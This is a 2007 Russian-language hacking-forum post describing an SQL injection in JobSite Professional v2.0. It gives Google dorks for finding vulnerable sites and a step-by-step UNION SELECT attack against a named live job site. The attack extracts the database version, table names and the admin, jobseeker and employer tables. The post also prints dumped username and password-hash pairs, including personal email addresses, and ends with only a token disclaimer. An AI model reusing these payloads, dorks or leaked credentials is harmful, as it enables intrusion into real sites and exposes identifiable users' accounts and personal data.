ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

SQL-inj в JobSite Professional v2.0
  #1  
Старый 08.11.2007, 18:51
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию SQL-inj в JobSite Professional v2.0

Программа: JobSite Professional v2.0
Цитата:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием File.php?. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
http://[site]/File.php?id=[sql]
Поиск в Гугл:
inurl:index.php?page=en_jobseekers - английская версия
inurl:index.php?page=fr_Candidats - французская версия
Пример:
_www.milkround.ie
Cмотрим версию мускула, пользователя, базу:
Код:
_http://www.milkround.ie/file.php?id=-1+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8/*
5.0.24a-standard:jobs_portal@localhost:jobs_portal
Смотрим названия таблиц, меняя лимит:
Код:
_http://www.milkround.ie/file.php?id=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+1,1/*
всего 106 таблиц.
Интересные таблицы:
Код:
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD),4,5,6,7,8+FROM+websiteadmin_admin_users/*
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD),4,5,6,7,8+FROM+websiteadmin_ext_jobseekers/*
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD),4,5,6,7,8+FROM+websiteadmin_ext_employers/*
administrator:61ff6c39c7925044f061566f4c21b267
scottbrien@hotmail.com:18859128760e989630b7d2073db 3f1ba
lizodonovan@eircom.net:cb0be83e6cb9e65c62da133391b 77a49

PS. Пример использования уязвимости, представлен только для ознакомления, все незаконные действия совершаемые Вами могут быть уголовно наказуемы и вся ответственность за неправоменрные действия лежит на вас.
AUTHOR : (нашёл уязвимость) ZynbER, пример мой ;-)
www.milw0rm.com

Последний раз редактировалось -=lebed=-; 08.11.2007 в 19:01..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ